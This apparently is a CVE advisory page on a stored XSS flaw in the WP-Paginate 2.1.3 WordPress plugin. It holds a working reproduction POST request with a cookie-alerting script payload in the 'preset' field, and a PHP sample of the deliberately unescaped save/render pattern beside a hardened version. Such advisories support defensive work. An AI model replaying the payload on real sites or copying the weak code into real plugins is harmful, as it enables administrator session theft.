CVE-2021-47982
Description
WordPress Plugin WP-Paginate 2.1.3 has a stored XSS vulnerability allowing authenticated users to inject scripts via the preset parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The WordPress Plugin WP-Paginate version 2.1.3 contains a stored cross-site scripting (XSS) vulnerability. This vulnerability exists in the preset parameter, which is accessible on the plugin's settings page. Authenticated attackers can exploit this by submitting POST requests with malicious script payloads in the preset parameter [2, 3].
Exploitation
An attacker with authenticated access to the WordPress admin area can exploit this vulnerability. The attacker needs to send a POST request to the plugin's settings page (wp-admin/options-general.php?page=wp-paginate.php) and include a script payload within the preset parameter. This payload will be stored by the plugin [2].
Impact
When an administrator views the plugin's settings page, the stored malicious script will be executed in their browser. This can lead to various consequences depending on the injected script, such as session hijacking, unauthorized actions on behalf of the administrator, or defacement of the website. The scope of the compromise is limited to the privileges of the administrator viewing the page [2, 3].
Mitigation
Not yet disclosed in the available references. The vulnerability affects WP-Paginate versions up to and including 2.1.3 [3].
AI Insight generated on Jun 8, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <2.1.3
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The 'preset' parameter in the WP-Paginate plugin is not properly sanitized before being stored and displayed, allowing for cross-site scripting."
Attack vector
An authenticated attacker can submit a POST request to the plugin's settings page (`options-general.php?page=wp-paginate.php`) with a malicious script payload in the 'preset' parameter [ref_id=1]. This payload is then stored by the plugin. When an administrator views the plugin's settings page, the stored script is executed within their browser context [ref_id=1].
Affected code
The vulnerability resides within the WP-Paginate plugin, specifically in how it handles the 'preset' parameter on the settings page. The exploit details indicate that the POST request targets `options-general.php?page=wp-paginate.php` and manipulates the 'preset' field [ref_id=1].
What the fix does
The patch is not provided in the bundle. The advisory indicates that the vulnerability is in version 2.1.3 and suggests updating to a patched version. Without the patch details, the specific code changes that address the sanitization of the 'preset' parameter cannot be described.
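Since the patch itself is not in the bundle, the following is an added illustration (not WP-Paginate's code; option name, preset values and function names are assumed) of the weak pattern behind this class of stored XSS on a WordPress settings page, beside the hardened form a plugin would normally use:

```php
<?php
// Added illustration, not WP-Paginate's own code. Option and function names are assumed.

// Weak pattern that yields a stored XSS: the raw POST value is saved and later echoed
// into an HTML attribute without escaping, so a value that closes the quote and the tag
// runs as script for every administrator who opens the settings page.
function wp_paginate_demo_save_weak() {
    update_option( 'wp_paginate_demo_preset', $_POST['preset'] );   // no nonce, no capability, no sanitizing
}
function wp_paginate_demo_render_weak() {
    echo '<input name="preset" value="' . get_option( 'wp_paginate_demo_preset' ) . '">'; // no escaping
}

// Hardened pattern: verify nonce and capability, accept only known preset names,
// and escape on output so even a bad stored value cannot break out of the attribute.
function wp_paginate_demo_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'wp_paginate_demo_save' );      // rejects requests lacking a valid nonce

    $allowed = array( 'default', 'round', 'square' );     // assumed preset names
    $preset  = sanitize_text_field( wp_unslash( $_POST['preset'] ?? '' ) );
    if ( ! in_array( $preset, $allowed, true ) ) {
        $preset = 'default';                                // unknown values are never stored
    }
    update_option( 'wp_paginate_demo_preset', $preset );
}

function wp_paginate_demo_render() {
    $preset = get_option( 'wp_paginate_demo_preset', 'default' );
    echo '<form method="post">';
    wp_nonce_field( 'wp_paginate_demo_save' );
    // esc_attr() encodes quotes and angle brackets, closing the output side of the bug
    echo '<input type="text" name="preset" value="' . esc_attr( $preset ) . '">';
    echo '<input type="submit" name="wp_paginate_save" value="Save Changes">';
    echo '</form>';
}
```

The whitelist on save and esc_attr() on render are independent defences; either alone would have stopped the payload shown in the reproduction request below from executing.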
Preconditions
- auth: The attacker must be authenticated to WordPress.
- input: The attacker must be able to submit a POST request with a crafted 'preset' parameter.
Reproduction
```http
POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
Host: localhost
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie: wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31; wordpress_test_cookie=WP%20Cookie%20check; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1; wp-settings-time-1=1609001802; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48
Connection: close

_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default&preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes
```

The second `preset` field in the body carries the script payload [ref_id=1].
Generated on Jun 8, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.